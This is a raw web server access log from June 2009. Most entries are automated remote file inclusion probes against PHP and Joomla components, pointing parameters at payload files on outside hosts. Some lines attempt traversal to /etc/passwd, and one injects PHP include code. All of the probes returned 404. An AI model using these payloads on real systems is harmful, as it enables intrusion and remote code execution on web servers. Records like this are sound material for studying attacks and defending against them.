69.65.123.44 - - [10/Jun/2009:05:20:17 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.14.117.22 - - [10/Jun/2009:05:20:48 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.820"
216.14.117.22 - - [10/Jun/2009:05:20:48 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.820"
80.74.64.27 - - [10/Jun/2009:05:20:57 -0400] "GET /logs/error_log.Q108102600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:05:20:57 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:05:20:57 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
70.85.165.10 - - [10/Jun/2009:05:21:45 -0400] "GET /logs/access_log.Q109051800%20%20/?sayfa=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.53.70.114 - - [10/Jun/2009:05:21:49 -0400] "GET /logs/access_log.Q109052400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.53.70.114 - - [10/Jun/2009:05:21:49 -0400] "GET /logs/access_log.Q109051800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:05:21:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [10/Jun/2009:05:22:18 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
80.74.64.27 - - [10/Jun/2009:05:22:22 -0400] "GET /logs/error_log.Q109051400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
201.232.54.48 - - [10/Jun/2009:05:22:22 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jun/2009:05:22:22 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.151.224.238 - - [10/Jun/2009:05:22:54 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.820"
209.151.224.238 - - [10/Jun/2009:05:22:54 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.820"
209.151.224.238 - - [10/Jun/2009:05:22:55 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.820"
66.232.143.238 - - [10/Jun/2009:05:22:59 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
110.45.145.92 - - [10/Jun/2009:05:23:31 -0400] "GET /logs/access_log.Q109051700/index.php?sayfa=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.145.92 - - [10/Jun/2009:05:23:31 -0400] "GET /index.php?sayfa=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
110.45.145.92 - - [10/Jun/2009:05:23:32 -0400] "GET /logs/index.php?sayfa=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
209.151.224.238 - - [10/Jun/2009:05:23:58 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.820"
201.232.54.48 - - [10/Jun/2009:05:24:53 -0400] "GET /logs/access_log.Q109052900%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:05:24:59 -0400] "GET /logs/access_log.Q109051800%20%20/?sayfa=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.56.77.54 - - [10/Jun/2009:05:25:19 -0400] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.56.77.54 - - [10/Jun/2009:05:25:19 -0400] "GET /logs/access_log.Q109051800/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:05:25:23 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:05:25:23 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:05:25:23 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.56.77.54 - - [10/Jun/2009:05:25:24 -0400] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:05:25:56 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:05:25:58 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
216.14.117.22 - - [10/Jun/2009:05:26:01 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 266 "-" "libwww-perl/5.820"
123.143.98.5 - - [10/Jun/2009:05:26:08 -0400] "GET /logs//com_fireboard.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
123.143.98.5 - - [10/Jun/2009:05:26:08 -0400] "GET //com_fireboard.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
123.143.98.5 - - [10/Jun/2009:05:26:11 -0400] "GET //com_fireboard.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
123.143.98.5 - - [10/Jun/2009:05:26:11 -0400] "GET /logs//com_fireboard.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:05:26:26 -0400] "GET /logs/access_log.Q109060500////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:05:26:31 -0400] "GET /logs/access_log.Q109052700////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:05:26:34 -0400] "GET /logs/access_log.Q109052700////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:05:26:37 -0400] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Jun/2009:05:26:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.206.170.126 - - [10/Jun/2009:05:27:07 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:27:07 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:27:08 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:05:28:07 -0400] "GET /logs/error_log.Q108061100/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
66.232.143.238 - - [10/Jun/2009:05:28:08 -0400] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
66.232.143.238 - - [10/Jun/2009:05:28:08 -0400] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
125.206.170.126 - - [10/Jun/2009:05:28:16 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:05:28:40 -0400] "GET /logs/access_log.Q109031800/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
206.225.92.50 - - [10/Jun/2009:05:28:44 -0400] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:05:28:44 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:05:29:22 -0400] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 251 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:05:29:22 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
216.119.103.12 - - [10/Jun/2009:05:30:00 -0400] "GET /main.php?pagina=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:30:00 -0400] "GET /logs/access_log.Q109052900/main.php?pagina=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:30:00 -0400] "GET /logs/main.php?pagina=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jun/2009:05:30:06 -0400] "GET /logs/error_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/media/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:30:20 -0400] "GET /logs/access_log.Q109052900%20%20/main.php?pagina=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:05:30:24 -0400] "GET /logs/access_log.Q109053000%20%20/main.php?pagina=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.229.183.77 - - [10/Jun/2009:05:30:45 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
213.229.183.77 - - [10/Jun/2009:05:30:45 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.229.183.77 - - [10/Jun/2009:05:30:45 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
213.229.183.77 - - [10/Jun/2009:05:30:49 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:05:31:15 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:05:31:15 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:05:31:15 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:05:31:16 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:05:31:16 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:05:31:16 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jun/2009:05:31:19 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:31:19 -0400] "GET /logs//pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 218 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:31:19 -0400] "GET //pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:31:20 -0400] "GET /logs/access_log.Q109052100//pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 240 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:05:31:21 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:05:31:21 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:05:31:21 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:05:31:25 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:05:31:31 -0400] "GET /logs/access_log.Q109052300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:05:31:34 -0400] "GET /logs/access_log.Q109052300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jun/2009:05:31:37 -0400] "GET /logs/access_log.Q109031800/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jun/2009:05:31:37 -0400] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jun/2009:05:31:37 -0400] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:31:38 -0400] "GET //pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:31:38 -0400] "GET /logs/access_log.Q109052100%20%20//pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:31:38 -0400] "GET /logs//pcl/pcltar.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 218 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jun/2009:05:31:45 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:05:31:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.119.103.12 - - [10/Jun/2009:05:31:53 -0400] "GET /logs/access_log.Q109053000/main.php?pagina=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jun/2009:05:32:27 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jun/2009:05:32:32 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.56.77.54 - - [10/Jun/2009:05:33:28 -0400] "GET /logs/access_log.Q109051800%20%20/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
213.229.183.77 - - [10/Jun/2009:05:33:42 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:05:33:50 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:05:34:19 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:05:34:19 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
199.120.90.222 - - [10/Jun/2009:05:34:57 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [10/Jun/2009:05:34:58 -0400] "GET /logs/access_log.Q109060500//login.php?dir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:05:35:51 -0400] "GET /logs/access_log.Q109060500////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:05:35:59 -0400] "GET /logs/access_log.Q109052700////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.188 - - [10/Jun/2009:05:36:04 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.27.203.107 - - [10/Jun/2009:05:36:05 -0400] "GET //skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
218.27.203.107 - - [10/Jun/2009:05:36:05 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
218.27.203.107 - - [10/Jun/2009:05:36:05 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
209.59.12.99 - - [10/Jun/2009:05:36:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [10/Jun/2009:05:38:05 -0400] "GET /logs/access_log.Q109052900/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:05:38:09 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
201.232.54.48 - - [10/Jun/2009:05:38:09 -0400] "GET /logs/access_log.Q109052800/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.125.38.117 - - [10/Jun/2009:05:38:23 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.125.38.117 - - [10/Jun/2009:05:38:23 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
217.125.38.117 - - [10/Jun/2009:05:38:23 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.27.203.107 - - [10/Jun/2009:05:39:59 -0400] "GET /logs/access_log.Q108112300//skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
217.125.38.117 - - [10/Jun/2009:05:40:01 -0400] "GET /logs/access_log.Q109052200%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.151.224.238 - - [10/Jun/2009:05:40:17 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.leeminhothailand.com/board/admin.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.820"
210.193.63.142 - - [10/Jun/2009:05:41:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
210.193.63.142 - - [10/Jun/2009:05:41:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
210.193.63.142 - - [10/Jun/2009:05:41:07 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
210.193.63.142 - - [10/Jun/2009:05:41:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
110.45.145.92 - - [10/Jun/2009:05:41:36 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.145.92 - - [10/Jun/2009:05:41:36 -0400] "GET /index.php?pag=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
